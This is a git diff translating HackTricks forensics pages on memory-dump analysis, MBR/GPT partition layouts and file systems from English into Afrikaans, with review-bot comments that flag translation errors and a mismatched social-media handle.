<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
|
||||
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
## Start
|
||||
## Begin
|
||||
|
||||
Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md).
|
||||
Begin met **soek na malware** binne die pcap. Gebruik die **gereedskap** wat genoem word in [**Malware-analise**](../malware-analysis.md).
|
||||
|
||||
## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)
|
||||
|
||||
**Volatility is the main open-source framework for memory dump analysis**. This Python tool analyzes dumps from external sources or VMware VMs, identifying data like processes and passwords based on the dump's OS profile. It's extensible with plugins, making it highly versatile for forensic investigations.
|
||||
**Volatility is die belangrikste oopbron-raamwerk vir geheue dump-analise**. Hierdie Python-gereedskap analiseer damps van eksterne bronne of VMware-VM's en identifiseer data soos prosesse en wagwoorde gebaseer op die dump se bedryfstelselprofiel. Dit is uitbreidbaar met plugins, wat dit baie veelsydig maak vir forensiese ondersoeke.
|
||||
|
||||
**[Find here a cheatsheet](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
|
||||
**[Vind hier 'n spiekbrief](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
|
||||
|
||||
|
||||
## Mini dump crash report
|
||||
## Mini dump-ongelukverslag
|
||||
|
||||
When the dump is small (just some KB, maybe a few MB) then it's probably a mini dump crash report and not a memory dump.
|
||||
Wanneer die dump klein is (net 'n paar KB, dalk 'n paar MB), is dit waarskynlik 'n mini dump-ongelukverslag en nie 'n geheue-dump nie.
|
||||
|
||||
![](<../../../.gitbook/assets/image (216).png>)
|
||||
|
||||
If you have Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed:
|
||||
As jy Visual Studio geïnstalleer het, kan jy hierdie lêer oopmaak en 'n paar basiese inligting soos prosesnaam, argitektuur, uitsonderingsinligting en uitgevoerde modules bind:
|
||||
|
||||
![](<../../../.gitbook/assets/image (217).png>)
|
||||
|
||||
You can also load the exception and see the decompiled instructions
|
||||
Jy kan ook die uitsondering laai en die gedekompileerde instruksies sien
|
||||
|
||||
![](<../../../.gitbook/assets/image (219).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (218) (1).png>)
|
||||
|
||||
Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of the dump.
|
||||
In elk geval is Visual Studio nie die beste gereedskap om 'n diepte-analise van die dump uit te voer nie.
|
||||
|
||||
You should **open** it using **IDA** or **Radare** to inspection it in **depth**.
|
||||
Jy moet dit **oopmaak** met behulp van **IDA** of **Radare** om dit in **diepte** te ondersoek.
|
||||
|
||||
|
||||
|
||||
|
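Review bot: "analiseer **damps** van eksterne bronne" in the Volatility paragraph is a typo for "dumps"; the same hunk writes "geheue-dump" and "Geheue dump-analise", so use "dumps" consistently and hyphenate the title as "Geheue-dump-analise" to match "geheue-dump" below it. Note also that "Begin met **soek na malware** binne die pcap" faithfully carries over a sentence about a pcap on a memory-dump page; that wording comes from the English source line it replaces, so it is worth correcting there rather than only in the translation.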
@ -55,18 +55,18 @@ You should **open** it using **IDA** or **Radare** to inspection it in **depth**
|
|||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
|
||||
[**RootedCON**](https://www.rootedcon.com/) is die mees relevante kuberveiligheidsevenement in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en kuberveiligheidspesialiste in elke dissipline.
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
|
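Review bot: the translated footer keeps the source's mismatch between link text and link target in `🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)`; the URL points at hacktricks_live, so the visible handle should read `@hacktricks_live` (the footer of the next file in this commit already does), otherwise readers who type the handle instead of clicking will look up the wrong account.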
@ -1,161 +1,158 @@
|
|||
# Partitions/File Systems/Carving
|
||||
# Partisies/ Lêersisteme/ Uitsnyding
|
||||
|
||||
## Partitions/File Systems/Carving
|
||||
## Partisies/ Lêersisteme/ Uitsnyding
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Partitions
|
||||
## Partisies
|
||||
|
||||
A hard drive or an **SSD disk can contain different partitions** with the goal of separating data physically.\
|
||||
The **minimum** unit of a disk is the **sector** (normally composed of 512B). So, each partition size needs to be multiple of that size.
|
||||
'n Harde skyf of 'n **SSD-skyf kan verskillende partisies bevat** met die doel om data fisies te skei.\
|
||||
Die **minimum** eenheid van 'n skyf is die **sektor** (gewoonlik saamgestel uit 512B). Dus moet elke partisie grootte 'n veelvoud van daardie grootte wees.
|
||||
|
||||
### MBR (master Boot Record)
|
||||
### MBR (Master Boot Record)
|
||||
|
||||
It's allocated in the **first sector of the disk after the 446B of the boot code**. This sector is essential to indicate to the PC what and from where a partition should be mounted.\
|
||||
It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\
|
||||
MBR allows **max 2.2TB**.
|
||||
Dit word toegewys in die **eerste sektor van die skyf na die 446B van die opstartkode**. Hierdie sektor is noodsaaklik om aan die rekenaar aan te dui wat en waarvandaan 'n partisie gemonteer moet word.\
|
||||
Dit laat tot **4 partisies** toe (slegs **1** kan aktief/ opstartbaar wees). As jy egter meer partisies nodig het, kan jy **uitgebreide partisies** gebruik. Die **laaste byte** van hierdie eerste sektor is die opstartrekord-handtekening **0x55AA**. Slegs een partisie kan as aktief gemerk word.\
|
||||
MBR laat **maksimum 2.2TB** toe.
|
||||
|
||||
![](<../../../.gitbook/assets/image (489).png>)
|
||||
|
||||
![](<../../../.gitbook/assets/image (490).png>)
|
||||
|
||||
From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Signature** (if Windows is used). The logical drive letter of the hard disk depends on the Windows Disk Signature. Changing this signature could prevent Windows from booting (tool: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**.
|
||||
Vanaf die **byte 440 tot 443** van die MBR kan jy die **Windows Disk Signature** vind (as Windows gebruik word). Die logiese aanduiding van die harde skyf hang af van die Windows Disk Signature. Die verandering van hierdie handtekening kan voorkom dat Windows opstart (hulpmiddel: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**.
|
||||
|
||||
![](<../../../.gitbook/assets/image (493).png>)
|
||||
|
||||
**Format**
|
||||
**Formaat**
|
||||
|
||||
| Offset | Length | Item |
|
||||
| Offset | Lengte | Item |
|
||||
| ----------- | ---------- | ------------------- |
|
||||
| 0 (0x00) | 446(0x1BE) | Boot code |
|
||||
| 446 (0x1BE) | 16 (0x10) | First Partition |
|
||||
| 462 (0x1CE) | 16 (0x10) | Second Partition |
|
||||
| 478 (0x1DE) | 16 (0x10) | Third Partition |
|
||||
| 494 (0x1EE) | 16 (0x10) | Fourth Partition |
|
||||
| 510 (0x1FE) | 2 (0x2) | Signature 0x55 0xAA |
|
||||
| 0 (0x00) | 446(0x1BE) | Opstartkode |
|
||||
| 446 (0x1BE) | 16 (0x10) | Eerste Partisie |
|
||||
| 462 (0x1CE) | 16 (0x10) | Tweede Partisie |
|
||||
| 478 (0x1DE) | 16 (0x10) | Derde Partisie |
|
||||
| 494 (0x1EE) | 16 (0x10) | Vierde Partisie |
|
||||
| 510 (0x1FE) | 2 (0x2) | Handtekening 0x55 0xAA |
|
||||
|
||||
**Partition Record Format**
|
||||
**Partisie Rekord Formaat**
|
||||
|
||||
| Offset | Length | Item |
|
||||
| Offset | Lengte | Item |
|
||||
| --------- | -------- | ------------------------------------------------------ |
|
||||
| 0 (0x00) | 1 (0x01) | Active flag (0x80 = bootable) |
|
||||
| 1 (0x01) | 1 (0x01) | Start head |
|
||||
| 2 (0x02) | 1 (0x01) | Start sector (bits 0-5); upper bits of cylinder (6- 7) |
|
||||
| 3 (0x03) | 1 (0x01) | Start cylinder lowest 8 bits |
|
||||
| 4 (0x04) | 1 (0x01) | Partition type code (0x83 = Linux) |
|
||||
| 5 (0x05) | 1 (0x01) | End head |
|
||||
| 6 (0x06) | 1 (0x01) | End sector (bits 0-5); upper bits of cylinder (6- 7) |
|
||||
| 7 (0x07) | 1 (0x01) | End cylinder lowest 8 bits |
|
||||
| 8 (0x08) | 4 (0x04) | Sectors preceding partition (little endian) |
|
||||
| 12 (0x0C) | 4 (0x04) | Sectors in partition |
|
||||
| 0 (0x00) | 1 (0x01) | Aktiewe vlag (0x80 = opstartbaar) |
|
||||
| 1 (0x01) | 1 (0x01) | Beginkop |
|
||||
| 2 (0x02) | 1 (0x01) | Beginsektor (bits 0-5); boonste bits van silinder (6-7) |
|
||||
| 3 (0x03) | 1 (0x01) | Begin silinder laagste 8 bits |
|
||||
| 4 (0x04) | 1 (0x01) | Partisie tipe kode (0x83 = Linux) |
|
||||
| 5 (0x05) | 1 (0x01) | Eindkop |
|
||||
| 6 (0x06) | 1 (0x01) | Eindsektor (bits 0-5); boonste bits van silinder (6-7) |
|
||||
| 7 (0x07) | 1 (0x01) | Eind silinder laagste 8 bits |
|
||||
| 8 (0x08) | 4 (0x04) | Sektors voor partisie (little endian) |
|
||||
| 12 (0x0C) | 4 (0x04) | Sektors in partisie |
|
||||
|
||||
In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command)
|
||||
Om 'n MBR in Linux te monteer, moet jy eers die beginverskuiwing kry (jy kan `fdisk` en die `p`-opdrag gebruik)
|
||||
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
|
||||
|
||||
And then use the following code
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
|
||||
|
||||
En gebruik dan die volgende kode
|
||||
```bash
|
||||
#Mount MBR in Linux
|
||||
mount -o ro,loop,offset=<Bytes>
|
||||
#63x512 = 32256Bytes
|
||||
mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
|
||||
```
|
||||
**LBA (Logiese blokadressering)**
|
||||
|
||||
**LBA (Logical block addressing)**
|
||||
**Logiese blokadressering** (**LBA**) is 'n algemene skema wat gebruik word om die ligging van blokke data op rekenaarstoorapparate, gewoonlik sekondêre stoorstelsels soos harde skywe, te spesifiseer. LBA is 'n besonder eenvoudige lineêre adresseringstelsel; blokke word geïdentifiseer deur 'n heelgetalindeks, waar die eerste blok LBA 0 is, die tweede LBA 1, en so aan.
|
||||
|
||||
**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on.
|
||||
### GPT (GUID-partisietabel)
|
||||
|
||||
### GPT (GUID Partition Table)
|
||||
Die GUID-partisietabel, bekend as GPT, word verkies vir sy verbeterde vermoëns in vergelyking met MBR (Meester Opstartrekord). Kenmerkend vir sy unieke identifiseerder vir partisies, steek GPT uit op verskeie maniere:
|
||||
|
||||
The GUID Partition Table, known as GPT, is favored for its enhanced capabilities compared to MBR (Master Boot Record). Distinctive for its **globally unique identifier** for partitions, GPT stands out in several ways:
|
||||
- **Ligging en Grootte**: Beide GPT en MBR begin by **sektor 0**. Tog werk GPT met **64-bits**, teenoor MBR se 32-bits.
|
||||
- **Partisiebeperkings**: GPT ondersteun tot **128 partisies** op Windows-stelsels en kan tot **9.4ZB** data akkommodeer.
|
||||
- **Partisienames**: Bied die vermoë om partisies te benoem met tot 36 Unicode-karakters.
|
||||
|
||||
- **Location and Size**: Both GPT and MBR start at **sector 0**. However, GPT operates on **64bits**, contrasting with MBR's 32bits.
|
||||
- **Partition Limits**: GPT supports up to **128 partitions** on Windows systems and accommodates up to **9.4ZB** of data.
|
||||
- **Partition Names**: Offers the ability to name partitions with up to 36 Unicode characters.
|
||||
**Databestendigheid en -herwinning**:
|
||||
|
||||
**Data Resilience and Recovery**:
|
||||
- **Redundansie**: Anders as MBR beperk GPT partisionering en opstartdata nie tot 'n enkele plek nie. Dit dupliseer hierdie data oor die skyf, wat data-integriteit en bestendigheid verbeter.
|
||||
- **Sikliese Redundansie Kontrole (CRC)**: GPT gebruik CRC om data-integriteit te verseker. Dit monitor aktief vir datakorrupsie, en wanneer dit opgespoor word, probeer GPT om die gekorruppeerde data van 'n ander skyfplek te herstel.
|
||||
|
||||
- **Redundancy**: Unlike MBR, GPT doesn't confine partitioning and boot data to a single place. It replicates this data across the disk, enhancing data integrity and resilience.
|
||||
- **Cyclic Redundancy Check (CRC)**: GPT employs CRC to ensure data integrity. It actively monitors for data corruption, and when detected, GPT attempts to recover the corrupted data from another disk location.
|
||||
**Beskermende MBR (LBA0)**:
|
||||
|
||||
**Protective MBR (LBA0)**:
|
||||
|
||||
- GPT maintains backward compatibility through a protective MBR. This feature resides in the legacy MBR space but is designed to prevent older MBR-based utilities from mistakenly overwriting GPT disks, hence safeguarding the data integrity on GPT-formatted disks.
|
||||
- GPT handhaaf agterwaartse verenigbaarheid deur middel van 'n beskermende MBR. Hierdie funksie bly in die erfenis MBR-ruimte, maar is ontwerp om te voorkom dat ouer MBR-gebaseerde hulpprogramme GPT-skywe per ongeluk oorskryf, en sodoende die data-integriteit op GPT-geformateerde skywe beskerm.
|
||||
|
||||
![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../.gitbook/assets/image (491).png>)
|
||||
|
||||
**Hybrid MBR (LBA 0 + GPT)**
|
||||
**Hibriede MBR (LBA 0 + GPT)**
|
||||
|
||||
[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
|
||||
[Vanaf Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
|
||||
|
||||
In operating systems that support **GPT-based boot through BIOS** services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes.
|
||||
In bedryfstelsels wat **GPT-gebaseerde opstart deur BIOS**-dienste ondersteun eerder as EFI, kan die eerste sektor ook steeds gebruik word om die eerste stadium van die **opstartlader**-kode te stoor, maar **aangepas** om **GPT-partisies** te herken. Die opstartlader in die MBR mag nie 'n sektor-grootte van 512 byte aanneem nie.
|
||||
|
||||
**Partition table header (LBA 1)**
|
||||
**Partisietabelkop (LBA 1)**
|
||||
|
||||
[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
|
||||
[Vanaf Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
|
||||
|
||||
The partition table header defines the usable blocks on the disk. It also defines the number and size of the partition entries that make up the partition table (offsets 80 and 84 in the table).
|
||||
Die partisietabelkop definieer die bruikbare blokke op die skyf. Dit definieer ook die aantal en grootte van die partisieinskrywings wat die partisietabel uitmaak (offsets 80 en 84 in die tabel).
|
||||
|
||||
| Offset | Length | Contents |
|
||||
| --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| 0 (0x00) | 8 bytes | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)on little-endian machines) |
|
||||
| 8 (0x08) | 4 bytes | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8 |
|
||||
| 12 (0x0C) | 4 bytes | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes) |
|
||||
| 16 (0x10) | 4 bytes | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation |
|
||||
| 20 (0x14) | 4 bytes | Reserved; must be zero |
|
||||
| 24 (0x18) | 8 bytes | Current LBA (location of this header copy) |
|
||||
| 32 (0x20) | 8 bytes | Backup LBA (location of the other header copy) |
|
||||
| 40 (0x28) | 8 bytes | First usable LBA for partitions (primary partition table last LBA + 1) |
|
||||
| 48 (0x30) | 8 bytes | Last usable LBA (secondary partition table first LBA − 1) |
|
||||
| 56 (0x38) | 16 bytes | Disk GUID in mixed endian |
|
||||
| 72 (0x48) | 8 bytes | Starting LBA of an array of partition entries (always 2 in primary copy) |
|
||||
| 80 (0x50) | 4 bytes | Number of partition entries in array |
|
||||
| 84 (0x54) | 4 bytes | Size of a single partition entry (usually 80h or 128) |
|
||||
| 88 (0x58) | 4 bytes | CRC32 of partition entries array in little endian |
|
||||
| 92 (0x5C) | \* | Reserved; must be zeroes for the rest of the block (420 bytes for a sector size of 512 bytes; but can be more with larger sector sizes) |
|
||||
| Offset | Lengte | Inhoud |
|
||||
| --------- | -------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| 0 (0x00) | 8 byte | Handtekening ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h of 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)op klein-eindige masjiene) |
|
||||
| 8 (0x08) | 4 byte | Hersiening 1.0 (00h 00h 01h 00h) vir UEFI 2.8 |
|
||||
| 12 (0x0C) | 4 byte | Kopgrootte in klein-eindige (in byte, gewoonlik 5Ch 00h 00h 00h of 92 byte) |
|
||||
| 16 (0x10) | 4 byte | [CRC32](https://en.wikipedia.org/wiki/CRC32) van die kop (offset +0 tot kopgrootte) in klein-eindige, met hierdie veld nul gemaak tydens berekening |
|
||||
| 20 (0x14) | 4 byte | Voorbehou; moet nul wees |
|
||||
| 24 (0x18) | 8 byte | Huidige LBA (ligging van hierdie kopie van die kop) |
|
||||
| 32 (0x20) | 8 byte | Rugsteun LBA (ligging van die ander kopie van die kop) |
|
||||
| 40 (0x28) | 8 byte | Eerste bruikbare LBA vir partisies (laaste LBA van primêre partisietabel + 1) |
|
||||
| 48 (0x30) | 8 byte | Laaste bruikbare LBA (eerste LBA van sekondêre partisietabel - 1) |
|
||||
| 56 (0x38) | 16 byte | Skyf-GUID in gemengde eindige |
|
||||
| 72 (0x48) | 8 byte | Begin-LBA van 'n reeks partisieinskrywings (altyd 2 in primêre kopie) |
|
||||
| 80 (0x50) | 4 byte | Aantal partisieinskrywings in reeks |
|
||||
| 84 (0x54) | 4 byte | Grootte van 'n enkele partisieinskrywing (gewoonlik 80h of 128) |
|
||||
| 88 (0x58) | 4 byte | CRC32 van die reeks partisieinskrywings in klein-eindige |
|
||||
| 92 (0x5C) | \* | Voorbehou; moet nulle wees vir die res van die blok (420 byte vir 'n sektorgrootte van 512 byte; maar kan meer wees met groter sektorgroottes) |
|
||||
|
||||
**Partition entries (LBA 2–33)**
|
||||
**Partisieinskrywings (LBA 2–33)**
|
||||
|
||||
| GUID partition entry format | | |
|
||||
| --------------------------- | -------- | ----------------------------------------------------------------------------------------------------------------- |
|
||||
| Offset | Length | Contents |
|
||||
| 0 (0x00) | 16 bytes | [Partition type GUID](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs) (mixed endian) |
|
||||
| 16 (0x10) | 16 bytes | Unique partition GUID (mixed endian) |
|
||||
| 32 (0x20) | 8 bytes | First LBA ([little endian](https://en.wikipedia.org/wiki/Little\_endian)) |
|
||||
| 40 (0x28) | 8 bytes | Last LBA (inclusive, usually odd) |
|
||||
| 48 (0x30) | 8 bytes | Attribute flags (e.g. bit 60 denotes read-only) |
|
||||
| 56 (0x38) | 72 bytes | Partition name (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE code units) |
|
||||
| GUID-partisieinskrywingsformaat | | |
|
||||
| ------------------------------ | -------- | ------------------------------------------------------------------------------------------------------------------- |
|
||||
| Offset | Lengte | Inhoud |
|
||||
| 0 (0x00) | 16 byte | [Partisietipe-GUID](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#Partition\_type\_GUIDs) (gemengde eindige) |
|
||||
| 16 (0x10) | 16 byte | Unieke partisie-GUID (gemengde eindige) |
|
||||
| 32 (0x20) | 8 byte | Eerste LBA ([klein-eindige](https://en.wikipedia.org/wiki/Little\_endian)) |
|
||||
| 40 (0x28) | 8 byte | Laaste LBA (inklusief, gewoonlik oneweredig) |
|
||||
| 48 (0x30) | 8 byte | Kenmerkvlaggies (bv. bit 60 dui op skryfbeskerming) |
|
||||
| 56 (0x38) | 72 byte | Partisienaam (36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE-kode-eenhede) |
|
||||
|
||||
**Partitions Types**
|
||||
**Partisietipes**
|
||||
|
||||
![](<../../../.gitbook/assets/image (492).png>)
|
||||
|
||||
More partition types in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
|
||||
Meer partisietipes in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
|
||||
|
||||
### Inspecting
|
||||
### Inspekteer
|
||||
|
||||
After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image an **MBR** was detected on the **sector 0** and interpreted:
|
||||
Nadat die forensiese beeld met [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/) gemoniteer is, kan jy die eerste sektor inspekteer met die Windows-hulpmiddel [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In die volgende afbeelding is 'n **MBR** op **sektor 0** opgespoor en geïnterpreteer:
|
||||
|
||||
![](<../../../.gitbook/assets/image (494).png>)
|
||||
|
||||
If it was a **GPT table instead of an MBR** it should appear the signature _EFI PART_ in the **sector 1** (which in the previous image is empty).
|
||||
As dit 'n **GPT-tabel in plaas van 'n MBR** was, sou die handtekening _EFI PART_ in **sektor 1** verskyn (wat in die vorige afbeelding leeg is).
|
||||
## Lêerstelsels
|
||||
|
||||
## File-Systems
|
||||
|
||||
### Windows file-systems list
|
||||
### Lys van Windows-lêerstelsels
|
||||
|
||||
* **FAT12/16**: MSDOS, WIN95/98/NT/200
|
||||
* **FAT32**: 95/2000/XP/2003/VISTA/7/8/10
|
||||
|
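Review bot: several technical terms in this hunk are mistranslated in ways that change the meaning, starting with `Nadat die forensiese beeld met [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/) gemoniteer is`, which says the image was monitored; mounting is `gemonteer`. In the GPT entry table, `Laaste LBA (inklusief, gewoonlik oneweredig)` renders "usually odd" as uneven or irregular, but the source means an odd number (`onewe`). `Die logiese aanduiding van die harde skyf hang af van die Windows Disk Signature` drops "drive letter" (`skyfletter`), which is the point of that sentence. The coined `klein-eindige` and `gemengde eindige` for little-endian and mixed endian will not be recognised by readers; keep the English terms in the tables, as the hunk already keeps MBR, GPT, LBA and CRC32 untranslated. Finally, the title `# Partisies/ Lêersisteme/ Uitsnyding` uses Lêersisteme (and adds a space after each slash, as does `aktief/ opstartbaar`) while the section heading below uses `## Lêerstelsels`; pick one spelling and drop the stray spaces.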
@ -165,81 +162,81 @@ If it was a **GPT table instead of an MBR** it should appear the signature _EFI
|
|||
|
||||
### FAT
|
||||
|
||||
The **FAT (File Allocation Table)** file system is designed around its core component, the file allocation table, positioned at the volume's start. This system safeguards data by maintaining **two copies** of the table, ensuring data integrity even if one is corrupted. The table, along with the root folder, must be in a **fixed location**, crucial for the system's startup process.
|
||||
